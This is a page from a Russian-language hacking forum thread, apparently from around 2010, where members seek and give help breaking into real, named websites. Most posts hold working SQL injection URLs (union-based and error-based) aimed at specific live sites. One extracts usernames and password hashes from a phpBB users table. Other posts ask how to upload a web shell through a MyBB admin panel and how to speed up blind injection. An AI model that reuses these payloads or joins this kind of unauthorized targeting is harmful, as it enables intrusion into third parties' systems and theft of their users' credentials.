Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Помогите достроить запрос чтоб при комменте не выдавал ошибку
    site.ru/index.php?id=12--+

     
  2. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Code:
    site.ru/index.php?id=12 AS temp_orders ON fl_orders.Email_new = temp_orders.Email_new JOIN fl_product_or+--+
    попробуй относительно этого крутить
     
  3. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Вот ссылка, мне не жалко но если кто-то ковырнет раньше меня то поделитесь со всеми

    http://www.flashloaded.com/cart/basket.php?action=Add&itemid=6587
     
  4. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Code:
    http://zurnals.maminuklubs.lv/lat/sludinajumi/?cat=-48'+union+select+1,2,3,4,5,6,7,8,9,10,concat(0x3a,version(),user(),database(),0x3a),12,13,14,15--+
     
    2 people like this.
  5. happygirl

    happygirl New Member

    Joined:
    10 Jul 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    почему "substring" не показывают данные?

    http://www.sudplanete.net/photo.php?menu=pers&no=8452+or+(1,2)=(select+count(0),concat((select+substring(table_name,1,10)+from+information_schema.tables limit 1,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--+
     
  6. roddik

    roddik Member

    Joined:
    14 Jan 2009
    Messages:
    117
    Likes Received:
    13
    Reputations:
    0
    Привет. Прочел конфиг апача, инклудятся файлы Include conf.d/*.conf, сервер redhat-linux-gnu, где по дефолту лежат конфиги виртуальных хостов?
     
  7. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    blind делаю в адресной строке запрос php?id=11+AND+ascii(lower(substring(user(),1,1)))>115
    долго очень перебирать имя юзера, можно ли через sipt
    ускорить перебор? каков должен быть запрос в сипт?
    (user(),{N1-115},1 или ?????
     
  8. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    toolza 1.0 лучше всего для блинда будет
     
  9. SENIA

    SENIA Elder - Старейшина

    Joined:
    22 Nov 2008
    Messages:
    478
    Likes Received:
    232
    Reputations:
    1
    Можно ли залить шелл через админку mybb 1.4.13? если да,то как?
     
  10. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,027
    Likes Received:
    311
    Reputations:
    86
    Помогите, пожалуйста, найти OpenX на сайте zurnals.maminuklubs.lv или он на верхнем поддомене, я уж обыскался, но не могу найти этот скрипт. Он там есть, версия 2.8.
     
    _________________________
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    user()
     
    1 person likes this.
  12. InfectedM

    InfectedM Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    155
    Likes Received:
    12
    Reputations:
    0
    Подскажите плиз как в этой скуле узнать кол-во полей
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.globalresponse.org/gra.php?i=current'+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+
     
    _________________________
    2 people like this.
  14. shuba

    shuba Elder - Старейшина

    Joined:
    22 May 2009
    Messages:
    593
    Likes Received:
    129
    Reputations:
    52
    Code:
    http://www.globalresponse.org/gra.php?i=current%27+union+select+1,2,3,4,5,6,7,8,9,10,12,13,14,15,16,17,18,19,20,21,22,23--+
    опередил:(
    :eek:

    А вот похенк)

    Code:
    http://www.globalresponse.org/gra.php?i=current%27+union+select+1,2,3,4,concat_ws%280x3a,username,user_password%29,6,7,8,9,10,12,13,14,15,16,17,18,19,20,21,22,23+from+phpbb_users+limit+1,1--+
     
    #14494 shuba, 14 Aug 2010
    Last edited: 14 Aug 2010
    1 person likes this.
  15. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Подскажите, каким алгоритмом шифруются пасы в redmine?
     
  16. Electr0n

    Electr0n Active Member

    Joined:
    19 Aug 2009
    Messages:
    0
    Likes Received:
    164
    Reputations:
    0
    Почему инфу не выводит?
    Слепая инъекция...
    Code:
    http://www.experienceegypt.info/templates/contactus.php?id=116+union+select+1,2,3,4,5,6--
     
    #14496 Electr0n, 15 Aug 2010
    Last edited: 15 Aug 2010
  17. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    _http://www.experienceegypt.info/templates/contactus.php?id=-116+union+select+1,2,version(),4,5,6,7,8,9+--+
     
    1 person likes this.
  18. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    о чём это говорит? You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union*/ /*!select*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- )) ORD' at line 1

    недопустимые символы? или же?
    как только не пробывал фильтровать
    ответ один и тот же.. либы ошибка(фильтр) или вот это сообщение
     
  19. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Синтаксис нарушен. Либо скобка не закрыта либо еще что-то. Но ошибка не из-за фильтрации чего либо.
     
  20. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    такой вопрос: видел где то раскручивали скулю на asp?ID=15 поискав немного не нащёл
    реально ведь вообще? можно пример привести + хотелось бы увидеть линк на статью по этой теме если есть
    так же столкнулся ещё с такой проблемой...
    http://www.tall.com/detail.php?itemid=7565&size=454/fuck
    иньекция есть, 1 колонка вывод данныех недоступен(
    посмотрите плыз
    да и по первому вопросу оч нуждаюсь в ответе
     
Thread Status:
Not open for further replies.